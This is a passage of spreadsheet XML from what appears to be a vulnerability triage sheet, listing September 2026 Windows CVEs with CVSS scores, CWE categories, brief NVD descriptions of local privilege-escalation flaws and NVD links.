      <c r="D489" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69290</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K49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91" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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92" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K49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93" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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94" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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95" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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96" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69324</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69328</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K499" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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00" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69359</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69368</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69377</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69389</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69392</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
